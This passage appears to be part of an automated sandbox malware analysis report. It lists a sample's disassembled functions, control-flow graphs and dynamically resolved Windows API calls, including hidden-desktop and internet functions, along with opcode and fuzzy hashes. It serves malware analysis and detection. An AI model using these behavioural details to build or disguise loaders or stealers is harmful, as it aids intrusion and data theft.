                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 66d80ddb320549e30eea46a0f46d461751134e1197675510af7b22b240b98bd3
                            • Instruction ID: 2051a2564d8ec1eaf11e6768d0df73c082c4989cfd1b4e00f3202dc58cd4e9fb
                            • Opcode Fuzzy Hash: 66d80ddb320549e30eea46a0f46d461751134e1197675510af7b22b240b98bd3
                            • Instruction Fuzzy Hash: 2CF0B4B1A40244BFC700DF98DD49B9EBBBCF744B21F10021AFD15E3280D7B8190487A1
                            Function 004566E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 4566e0-4566e7 634 4566ed-456af9 GetProcAddress * 43 633->634 635 456afe-456b92 LoadLibraryA * 8 633->635 634->635 636 456b94-456c03 GetProcAddress * 5 635->636 637 456c08-456c0f 635->637 636->637 638 456c15-456ccd GetProcAddress * 8 637->638 639 456cd2-456cd9 637->639 638->639 640 456d4f-456d56 639->640 641 456cdb-456d4a GetProcAddress * 5 639->641 642 456d5c-456de4 GetProcAddress * 6 640->642 643 456de9-456df0 640->643 641->640 642->643 644 456df6-456f0b GetProcAddress * 12 643->644 645 456f10-456f17 643->645 644->645 646 456f8d-456f94 645->646 647 456f19-456f88 GetProcAddress * 5 645->647 648 456f96-456fbc GetProcAddress * 2 646->648 649 456fc1-456fc8 646->649 647->646 648->649 650 456ff5-456ffc 649->650 651 456fca-456ff0 GetProcAddress * 2 649->651 652 457002-4570e8 GetProcAddress * 10 650->652 653 4570ed-4570f4 650->653 651->650 652->653 654 4570f6-45714d GetProcAddress * 4 653->654 655 457152-457159 653->655 654->655 656 45716e-457175 655->656 657 45715b-457169 GetProcAddress 655->657 658 457177-4571ce GetProcAddress * 4 656->658 659 4571d3 656->659 657->656 658->659
                            APIs
                            • GetProcAddress.KERNEL32(76210000,00FE63B8), ref: 004566F5
                            • GetProcAddress.KERNEL32(76210000,00FE6218), ref: 0045670D
                            • GetProcAddress.KERNEL32(76210000,00FF9888), ref: 00456726
                            • GetProcAddress.KERNEL32(76210000,00FF97C8), ref: 0045673E
                            • GetProcAddress.KERNEL32(76210000,00FF9828), ref: 00456756
                            • GetProcAddress.KERNEL32(76210000,00FFE008), ref: 0045676F
                            • GetProcAddress.KERNEL32(76210000,00FEA6E8), ref: 00456787
                            • GetProcAddress.KERNEL32(76210000,00FFDF78), ref: 0045679F
                            • GetProcAddress.KERNEL32(76210000,00FFDEB8), ref: 004567B8
                            • GetProcAddress.KERNEL32(76210000,00FFDF18), ref: 004567D0
                            • GetProcAddress.KERNEL32(76210000,00FFDFF0), ref: 004567E8
                            • GetProcAddress.KERNEL32(76210000,00FE61D8), ref: 00456801
                            • GetProcAddress.KERNEL32(76210000,00FE6138), ref: 00456819
                            • GetProcAddress.KERNEL32(76210000,00FE63F8), ref: 00456831
                            • GetProcAddress.KERNEL32(76210000,00FE6438), ref: 0045684A
                            • GetProcAddress.KERNEL32(76210000,00FFDF90), ref: 00456862
                            • GetProcAddress.KERNEL32(76210000,00FFE020), ref: 0045687A
                            • GetProcAddress.KERNEL32(76210000,00FEA9E0), ref: 00456893
                            • GetProcAddress.KERNEL32(76210000,00FE6498), ref: 004568AB
                            • GetProcAddress.KERNEL32(76210000,00FFDFD8), ref: 004568C3
                            • GetProcAddress.KERNEL32(76210000,00FFDF00), ref: 004568DC
                            • GetProcAddress.KERNEL32(76210000,00FFDFA8), ref: 004568F4
                            • GetProcAddress.KERNEL32(76210000,00FFDFC0), ref: 0045690C
                            • GetProcAddress.KERNEL32(76210000,00FE61B8), ref: 00456925
                            • GetProcAddress.KERNEL32(76210000,00FFE038), ref: 0045693D
                            • GetProcAddress.KERNEL32(76210000,00FFDEE8), ref: 00456955
                            • GetProcAddress.KERNEL32(76210000,00FFDF30), ref: 0045696E
                            • GetProcAddress.KERNEL32(76210000,00FFDE88), ref: 00456986
                            • GetProcAddress.KERNEL32(76210000,00FFDED0), ref: 0045699E
                            • GetProcAddress.KERNEL32(76210000,00FFDEA0), ref: 004569B7
                            • GetProcAddress.KERNEL32(76210000,00FFDF60), ref: 004569CF
                            • GetProcAddress.KERNEL32(76210000,00FFDF48), ref: 004569E7
                            • GetProcAddress.KERNEL32(76210000,00FFD918), ref: 00456A00
                            • GetProcAddress.KERNEL32(76210000,00FEFDB8), ref: 00456A18
                            • GetProcAddress.KERNEL32(76210000,00FFDB58), ref: 00456A30
                            • GetProcAddress.KERNEL32(76210000,00FFD9F0), ref: 00456A49
                            • GetProcAddress.KERNEL32(76210000,00FE6238), ref: 00456A61
                            • GetProcAddress.KERNEL32(76210000,00FFDA80), ref: 00456A79
                            • GetProcAddress.KERNEL32(76210000,00FE6278), ref: 00456A92
                            • GetProcAddress.KERNEL32(76210000,00FFDA08), ref: 00456AAA
                            • GetProcAddress.KERNEL32(76210000,00FFDA98), ref: 00456AC2
                            • GetProcAddress.KERNEL32(76210000,00FE64B8), ref: 00456ADB
                            • GetProcAddress.KERNEL32(76210000,00FE6298), ref: 00456AF3
                            • LoadLibraryA.KERNEL32(00FFDA20,0045051F), ref: 00456B05
                            • LoadLibraryA.KERNEL32(00FFD9D8), ref: 00456B16
                            • LoadLibraryA.KERNEL32(00FFD8E8), ref: 00456B28
                            • LoadLibraryA.KERNEL32(00FFDB10), ref: 00456B3A
                            • LoadLibraryA.KERNEL32(00FFDAB0), ref: 00456B4B
                            • LoadLibraryA.KERNEL32(00FFD8D0), ref: 00456B5D
                            • LoadLibraryA.KERNEL32(00FFD8A0), ref: 00456B6F
                            • LoadLibraryA.KERNEL32(00FFDA38), ref: 00456B80
                            • GetProcAddress.KERNEL32(751E0000,00FE60D8), ref: 00456B9C
                            • GetProcAddress.KERNEL32(751E0000,00FFDA68), ref: 00456BB4
                            • GetProcAddress.KERNEL32(751E0000,00FF92D0), ref: 00456BCD
                            • GetProcAddress.KERNEL32(751E0000,00FFDA50), ref: 00456BE5
                            • GetProcAddress.KERNEL32(751E0000,00FE60F8), ref: 00456BFD
                            • GetProcAddress.KERNEL32(73FC0000,00FEA6C0), ref: 00456C1D
                            • GetProcAddress.KERNEL32(73FC0000,00FE66B8), ref: 00456C35
                            • GetProcAddress.KERNEL32(73FC0000,00FEA800), ref: 00456C4E
                            • GetProcAddress.KERNEL32(73FC0000,00FFDB70), ref: 00456C66
                            • GetProcAddress.KERNEL32(73FC0000,00FFD9A8), ref: 00456C7E
                            • GetProcAddress.KERNEL32(73FC0000,00FE6618), ref: 00456C97
                            • GetProcAddress.KERNEL32(73FC0000,00FE6698), ref: 00456CAF
                            • GetProcAddress.KERNEL32(73FC0000,00FFDB40), ref: 00456CC7
                            • GetProcAddress.KERNEL32(753A0000,00FE67B8), ref: 00456CE3
                            • GetProcAddress.KERNEL32(753A0000,00FE67D8), ref: 00456CFB
                            • GetProcAddress.KERNEL32(753A0000,00FFDAC8), ref: 00456D14
                            • GetProcAddress.KERNEL32(753A0000,00FFD990), ref: 00456D2C
                            • GetProcAddress.KERNEL32(753A0000,00FE6638), ref: 00456D44
                            • GetProcAddress.KERNEL32(76310000,00FEAAF8), ref: 00456D64
                            • GetProcAddress.KERNEL32(76310000,00FEA710), ref: 00456D7C
                            • GetProcAddress.KERNEL32(76310000,00FFDB28), ref: 00456D95
                            • GetProcAddress.KERNEL32(76310000,00FE6598), ref: 00456DAD
                            • GetProcAddress.KERNEL32(76310000,00FE6798), ref: 00456DC5
                            • GetProcAddress.KERNEL32(76310000,00FEAA08), ref: 00456DDE
                            • GetProcAddress.KERNEL32(76910000,00FFD930), ref: 00456DFE
                            • GetProcAddress.KERNEL32(76910000,00FE64F8), ref: 00456E16
                            • GetProcAddress.KERNEL32(76910000,00FF9420), ref: 00456E2F
                            • GetProcAddress.KERNEL32(76910000,00FFD9C0), ref: 00456E47
                            • GetProcAddress.KERNEL32(76910000,00FFDAE0), ref: 00456E5F
                            • GetProcAddress.KERNEL32(76910000,00FE6578), ref: 00456E78
                            • GetProcAddress.KERNEL32(76910000,00FE6658), ref: 00456E90
                            • GetProcAddress.KERNEL32(76910000,00FFDAF8), ref: 00456EA8
                            • GetProcAddress.KERNEL32(76910000,00FFD888), ref: 00456EC1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00456ED7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00456EEE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00456F05
                            • GetProcAddress.KERNEL32(75B30000,00FE6858), ref: 00456F21
                            • GetProcAddress.KERNEL32(75B30000,00FFD8B8), ref: 00456F39
                            • GetProcAddress.KERNEL32(75B30000,00FFD900), ref: 00456F52
                            • GetProcAddress.KERNEL32(75B30000,00FFD948), ref: 00456F6A
                            • GetProcAddress.KERNEL32(75B30000,00FFD960), ref: 00456F82
                            • GetProcAddress.KERNEL32(75670000,00FE67F8), ref: 00456F9E
                            • GetProcAddress.KERNEL32(75670000,00FE6838), ref: 00456FB6
                            • GetProcAddress.KERNEL32(76AC0000,00FE6718), ref: 00456FD2
                            • GetProcAddress.KERNEL32(76AC0000,00FFD978), ref: 00456FEA
                            • GetProcAddress.KERNEL32(6F4D0000,00FE65B8), ref: 0045700A
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6878), ref: 00457022
                            • GetProcAddress.KERNEL32(6F4D0000,00FE65D8), ref: 0045703B
                            • GetProcAddress.KERNEL32(6F4D0000,00FFDE40), ref: 00457053
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6818), ref: 0045706B
                            • GetProcAddress.KERNEL32(6F4D0000,00FE66D8), ref: 00457084
                            • GetProcAddress.KERNEL32(6F4D0000,00FE64D8), ref: 0045709C
                            • GetProcAddress.KERNEL32(6F4D0000,00FE6518), ref: 004570B4
                            • GetProcAddress.KERNEL32(6F4D0000,InternetSetOptionA), ref: 004570CB
                            • GetProcAddress.KERNEL32(6F4D0000,HttpQueryInfoA), ref: 004570E2
                            • GetProcAddress.KERNEL32(75AE0000,00FFDD50), ref: 004570FE
                            • GetProcAddress.KERNEL32(75AE0000,00FF9300), ref: 00457116
                            • GetProcAddress.KERNEL32(75AE0000,00FFDCD8), ref: 0045712F
                            • GetProcAddress.KERNEL32(75AE0000,00FFDBB8), ref: 00457147
                            • GetProcAddress.KERNEL32(76300000,00FE6538), ref: 00457163
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDBA0), ref: 0045717F
                            • GetProcAddress.KERNEL32(6D3F0000,00FE65F8), ref: 00457197
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDBD0), ref: 004571B0
                            • GetProcAddress.KERNEL32(6D3F0000,00FFDC30), ref: 004571C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 1483e82d52bd042b0b0c463fa581eb45bf7f9db82a3f049354c261c75735da3d
                            • Instruction ID: 48fc0dd9fe99f83ccfc4da9faaf98814cdd0ed980b1145a5568fec747095c6ea
                            • Opcode Fuzzy Hash: 1483e82d52bd042b0b0c463fa581eb45bf7f9db82a3f049354c261c75735da3d
                            • Instruction Fuzzy Hash: 1E624AB5618200AFD754DFB4EC88A263BBFF789345310AA1DED5683364DBB4A810DB70
                            Function 0044F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F1D5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F1F1
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F1FC
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F215
                            • lstrlen.KERNEL32(0045CFEC), ref: 0044F220
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F239
                            • lstrcpy.KERNEL32(00000000,00464FA0), ref: 0044F25E
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F28C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F2C0
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044F2F0
                            • lstrlen.KERNEL32(00FE61F8), ref: 0044F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9e3adf3ea52060e018a155f9e3083566356407eac9b95b276bc105d14d2c963a
                            • Instruction ID: 700f3ff1e0577e25344fd29339c00363cc299a331282ec5905263d3fe264ecf8
                            • Opcode Fuzzy Hash: 9e3adf3ea52060e018a155f9e3083566356407eac9b95b276bc105d14d2c963a
                            • Instruction Fuzzy Hash: 7BA25C70A012029FEB20EF75D948A5BB7F5AF44304F29907AE809DB361DB79DC46CB58
                            Function 0044FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450013
                            • lstrlen.KERNEL32(0045CFEC), ref: 004500BD
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004500E1
                            • lstrlen.KERNEL32(0045CFEC), ref: 004500EC
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450110
                            • lstrlen.KERNEL32(0045CFEC), ref: 0045011B
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045013F
                            • lstrlen.KERNEL32(0045CFEC), ref: 0045015A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450189
                            • lstrlen.KERNEL32(0045CFEC), ref: 00450194
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004501C3
                            • lstrlen.KERNEL32(0045CFEC), ref: 004501CE
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450206
                            • lstrlen.KERNEL32(0045CFEC), ref: 00450250
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00450288
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045059B
                            • lstrlen.KERNEL32(00FE6398), ref: 004505AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 004505D7
                            • lstrcat.KERNEL32(00000000,?), ref: 004505E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0045060E
                            • lstrlen.KERNEL32(00FFF580), ref: 00450625
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00450658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00450681
                            • lstrlen.KERNEL32(00FE6478), ref: 00450698
                            • lstrcpy.KERNEL32(00000000,?), ref: 004506C9
                            • lstrcat.KERNEL32(00000000,?), ref: 004506D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00450706
                            • lstrcpy.KERNEL32(00000000,00FF9360), ref: 0045074B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0045077F
                            • lstrcpy.KERNEL32(00000000,00FFF610), ref: 004507E7
                            • lstrcpy.KERNEL32(00000000,00FF9110), ref: 00450858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 004508CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00450928
                            • lstrcpy.KERNEL32(00000000,00FF91A0), ref: 004509F8
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 00432528
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 0043254E
                              • Part of subcall function 004324E0: lstrcpy.KERNEL32(00000000,?), ref: 00432577
                            • lstrcpy.KERNEL32(00000000,00FF9170), ref: 00450ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00450B81
                            • lstrcpy.KERNEL32(00000000,00FF9170), ref: 00450D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 26a1543bb302a97b43072489c6ef1775c95b9e719096dca9b913f52612548b0b
                            • Instruction ID: 374682ae74a9943c036692ab673f60c04b1917a8ebaa5f14ffeb383f71996368
                            • Opcode Fuzzy Hash: 26a1543bb302a97b43072489c6ef1775c95b9e719096dca9b913f52612548b0b
                            • Instruction Fuzzy Hash: 8FE29C71A053418FD734DF2AC484B5AB7E0BF88305F58856EE88D8B362DB79D849CB46
                            Function 0044F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00FE61F8), ref: 0044F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F47B
                            • lstrcpy.KERNEL32(00000000,00FE61F8), ref: 0044F4BB
                            • lstrcpy.KERNEL32(00000000,00FF93C0), ref: 0044F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0044F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044F718
                            • lstrlen.KERNEL32(00FF9320), ref: 0044F746
                            • lstrcpy.KERNEL32(00000000,00FF9320), ref: 0044F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044FA32
                            • lstrlen.KERNEL32(00FF9350), ref: 0044FA60
                            • lstrcpy.KERNEL32(00000000,00FF9350), ref: 0044FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044FAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 485bac86ec37ee6ede6ea69bd9618c0f0b82b41ca74b2178999e7e4b165d1572
                            • Instruction ID: 3d56af4ea4f152639c3b77903187499b52a86b23c9635541bf3d8848b1e4a6a3
                            • Opcode Fuzzy Hash: 485bac86ec37ee6ede6ea69bd9618c0f0b82b41ca74b2178999e7e4b165d1572
                            • Instruction Fuzzy Hash: 6EF14D70A01202CFEB24DF69C944A1AB7F5BF44314B2991BFD8099B361EB79DC46CB58
                            Function 00448CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 448ca0-448cc4 StrCmpCA 2722 448cc6-448cc7 ExitProcess 2721->2722 2723 448ccd-448ce6 2721->2723 2725 448ee2-448eef call 432a20 2723->2725 2726 448cec-448cf1 2723->2726 2727 448cf6-448cf9 2726->2727 2729 448ec3-448edc 2727->2729 2730 448cff 2727->2730 2729->2725 2770 448cf3 2729->2770 2732 448d84-448d92 StrCmpCA 2730->2732 2733 448da4-448db8 StrCmpCA 2730->2733 2734 448d06-448d15 lstrlen 2730->2734 2735 448e6f-448e7d StrCmpCA 2730->2735 2736 448e88-448e9a lstrlen 2730->2736 2737 448e56-448e64 StrCmpCA 2730->2737 2738 448d30-448d3f lstrlen 2730->2738 2739 448dbd-448dcb StrCmpCA 2730->2739 2740 448ddd-448deb StrCmpCA 2730->2740 2741 448dfd-448e0b StrCmpCA 2730->2741 2742 448e1d-448e2b StrCmpCA 2730->2742 2743 448e3d-448e4b StrCmpCA 2730->2743 2744 448d5a-448d69 lstrlen 2730->2744 2732->2729 2761 448d98-448d9f 2732->2761 2733->2729 2749 448d17-448d1c call 432a20 2734->2749 2750 448d1f-448d2b call 432930 2734->2750 2735->2729 2753 448e7f-448e86 2735->2753 2754 448ea4-448eb0 call 432930 2736->2754 2755 448e9c-448ea1 call 432a20 2736->2755 2737->2729 2752 448e66-448e6d 2737->2752 2756 448d41-448d46 call 432a20 2738->2756 2757 448d49-448d55 call 432930 2738->2757 2739->2729 2745 448dd1-448dd8 2739->2745 2740->2729 2746 448df1-448df8 2740->2746 2741->2729 2747 448e11-448e18 2741->2747 2742->2729 2748 448e31-448e38 2742->2748 2743->2729 2751 448e4d-448e54 2743->2751 2758 448d73-448d7f call 432930 2744->2758 2759 448d6b-448d70 call 432a20 2744->2759 2745->2729 2746->2729 2747->2729 2748->2729 2749->2750 2779 448eb3-448eb5 2750->2779 2751->2729 2752->2729 2753->2729 2754->2779 2755->2754 2756->2757 2757->2779 2758->2779 2759->2758 2761->2729 2770->2727 2779->2729 2780 448eb7-448eb9 2779->2780 2780->2729 2781 448ebb-448ebd lstrcpy 2780->2781 2781->2729
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
